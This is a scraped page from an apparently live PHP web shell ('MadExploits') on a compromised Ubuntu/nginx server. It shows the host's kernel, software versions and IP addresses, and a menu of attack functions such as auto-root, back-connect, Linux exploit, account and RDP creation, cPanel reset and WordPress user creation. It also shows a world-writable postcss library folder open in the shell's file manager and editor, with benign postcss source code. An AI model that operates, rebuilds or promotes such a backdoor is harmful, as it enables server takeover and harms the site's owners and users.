Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
postcss /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
at-rule.d.ts
3.33
KB
-rw-rw-rw-
at-rule.js
471
B
-rw-rw-rw-
comment.d.ts
1.71
KB
-rw-rw-rw-
comment.js
203
B
-rw-rw-rw-
container.d.ts
13.74
KB
-rw-rw-rw-
container.js
10.4
KB
-rw-rw-rw-
css-syntax-error.d.ts
6.36
KB
-rw-rw-rw-
css-syntax-error.js
3.32
KB
-rw-rw-rw-
declaration.d.ts
3.81
KB
-rw-rw-rw-
declaration.js
495
B
-rw-rw-rw-
document.d.ts
1.91
KB
-rw-rw-rw-
document.js
654
B
-rw-rw-rw-
fromJSON.d.ts
162
B
-rw-rw-rw-
fromJSON.js
1.47
KB
-rw-rw-rw-
input.d.ts
4.4
KB
-rw-rw-rw-
input.js
6.04
KB
-rw-rw-rw-
lazy-result.d.ts
4.89
KB
-rw-rw-rw-
lazy-result.js
13.24
KB
-rw-rw-rw-
list.d.ts
1.39
KB
-rw-rw-rw-
list.js
1.2
KB
-rw-rw-rw-
map-generator.js
9.49
KB
-rw-rw-rw-
no-work-result.d.ts
1.54
KB
-rw-rw-rw-
no-work-result.js
2.56
KB
-rw-rw-rw-
node.d.ts
13.78
KB
-rw-rw-rw-
node.js
9.41
KB
-rw-rw-rw-
parse.d.ts
135
B
-rw-rw-rw-
parse.js
1.12
KB
-rw-rw-rw-
parser.js
14.37
KB
-rw-rw-rw-
postcss.d.mts
1.02
KB
-rw-rw-rw-
postcss.d.ts
11.04
KB
-rw-rw-rw-
postcss.js
2.83
KB
-rw-rw-rw-
postcss.mjs
980
B
-rw-rw-rw-
previous-map.d.ts
1.78
KB
-rw-rw-rw-
previous-map.js
3.89
KB
-rw-rw-rw-
processor.d.ts
3.33
KB
-rw-rw-rw-
processor.js
1.7
KB
-rw-rw-rw-
result.d.ts
4.31
KB
-rw-rw-rw-
result.js
745
B
-rw-rw-rw-
root.d.ts
2.27
KB
-rw-rw-rw-
root.js
1.21
KB
-rw-rw-rw-
rule.d.ts
2.9
KB
-rw-rw-rw-
rule.js
569
B
-rw-rw-rw-
stringifier.d.ts
1.38
KB
-rw-rw-rw-
stringifier.js
8.03
KB
-rw-rw-rw-
stringify.d.ts
165
B
-rw-rw-rw-
stringify.js
213
B
-rw-rw-rw-
symbols.js
91
B
-rw-rw-rw-
terminal-highlight.js
1.37
KB
-rw-rw-rw-
tokenize.js
6.38
KB
-rw-rw-rw-
warn-once.js
256
B
-rw-rw-rw-
warning.d.ts
2.92
KB
-rw-rw-rw-
warning.js
739
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : previous-map.js
'use strict' let { existsSync, readFileSync } = require('fs') let { dirname, join } = require('path') let { SourceMapConsumer, SourceMapGenerator } = require('source-map-js') function fromBase64(str) { if (Buffer) { return Buffer.from(str, 'base64').toString() } else { /* c8 ignore next 2 */ return window.atob(str) } } class PreviousMap { constructor(css, opts) { if (opts.map === false) return this.loadAnnotation(css) this.inline = this.startWith(this.annotation, 'data:') let prev = opts.map ? opts.map.prev : undefined let text = this.loadMap(opts.from, prev) if (!this.mapFile && opts.from) { this.mapFile = opts.from } if (this.mapFile) this.root = dirname(this.mapFile) if (text) this.text = text } consumer() { if (!this.consumerCache) { this.consumerCache = new SourceMapConsumer(this.text) } return this.consumerCache } decodeInline(text) { let baseCharsetUri = /^data:application\/json;charset=utf-?8;base64,/ let baseUri = /^data:application\/json;base64,/ let charsetUri = /^data:application\/json;charset=utf-?8,/ let uri = /^data:application\/json,/ let uriMatch = text.match(charsetUri) || text.match(uri) if (uriMatch) { return decodeURIComponent(text.substr(uriMatch[0].length)) } let baseUriMatch = text.match(baseCharsetUri) || text.match(baseUri) if (baseUriMatch) { return fromBase64(text.substr(baseUriMatch[0].length)) } let encoding = text.match(/data:application\/json;([^,]+),/)[1] throw new Error('Unsupported source map encoding ' + encoding) } getAnnotationURL(sourceMapString) { return sourceMapString.replace(/^\/\*\s*# sourceMappingURL=/, '').trim() } isMap(map) { if (typeof map !== 'object') return false return ( typeof map.mappings === 'string' || typeof map._mappings === 'string' || Array.isArray(map.sections) ) } loadAnnotation(css) { let comments = css.match(/\/\*\s*# sourceMappingURL=/g) if (!comments) return // sourceMappingURLs from comments, strings, etc. let start = css.lastIndexOf(comments.pop()) let end = css.indexOf('*/', start) if (start > -1 && end > -1) { // Locate the last sourceMappingURL to avoid pickin this.annotation = this.getAnnotationURL(css.substring(start, end)) } } loadFile(path) { this.root = dirname(path) if (existsSync(path)) { this.mapFile = path return readFileSync(path, 'utf-8').toString().trim() } } loadMap(file, prev) { if (prev === false) return false if (prev) { if (typeof prev === 'string') { return prev } else if (typeof prev === 'function') { let prevPath = prev(file) if (prevPath) { let map = this.loadFile(prevPath) if (!map) { throw new Error( 'Unable to load previous source map: ' + prevPath.toString() ) } return map } } else if (prev instanceof SourceMapConsumer) { return SourceMapGenerator.fromSourceMap(prev).toString() } else if (prev instanceof SourceMapGenerator) { return prev.toString() } else if (this.isMap(prev)) { return JSON.stringify(prev) } else { throw new Error( 'Unsupported previous source map format: ' + prev.toString() ) } } else if (this.inline) { return this.decodeInline(this.annotation) } else if (this.annotation) { let map = this.annotation if (file) map = join(dirname(file), map) return this.loadFile(map) } } startWith(string, start) { if (!string) return false return string.substr(0, start.length) === start } withContent() { return !!( this.consumer().sourcesContent && this.consumer().sourcesContent.length > 0 ) } } module.exports = PreviousMap PreviousMap.default = PreviousMap
Close